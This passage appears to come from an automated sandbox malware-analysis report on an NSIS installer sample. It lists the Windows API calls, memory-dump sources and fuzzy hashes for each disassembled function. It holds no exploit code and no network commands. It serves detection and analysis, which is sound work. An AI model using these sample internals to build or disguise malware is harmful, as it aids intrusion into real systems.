                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                                                    • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                                                                                                                                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                                                    • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040692D
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                    • String ID: %s%S.dll$UXTHEME
                                                                                                                                                                                    • API String ID: 2200240437-1106614640
                                                                                                                                                                                    • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                                                    • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017B5
                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017DA
                                                                                                                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                                                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                                                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,?,74DF23A0), ref: 00405637
                                                                                                                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
                                                                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                                                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1941528284-0
                                                                                                                                                                                    • Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                                                                                                                    • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1354259210-0
                                                                                                                                                                                    • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                                                                                    • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                                                                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                    • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                                                                    • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(?), ref: 00401E56
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                                                                    • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                                                                    • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                                                                                                                                                                    • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                                                                    • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                    • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                                                                    • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404E2D
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                                                    • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                                                                    • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                                                                                                                    • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(?,00000000,004031FC,00000001), ref: 00403031
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                                                    • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                                                                    • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040557F
                                                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                                                                                                                                                                      • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                    • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                                                                                                                    • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                                                                                                                                                                    • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00406094
                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403530,00441000,00441800,00441800,00441800,00441800,00441800,00441800,0040381C), ref: 004060AF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                    • String ID: nsa
                                                                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                                                                    • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                                                    • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                    • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                                                    • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                                                                    • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69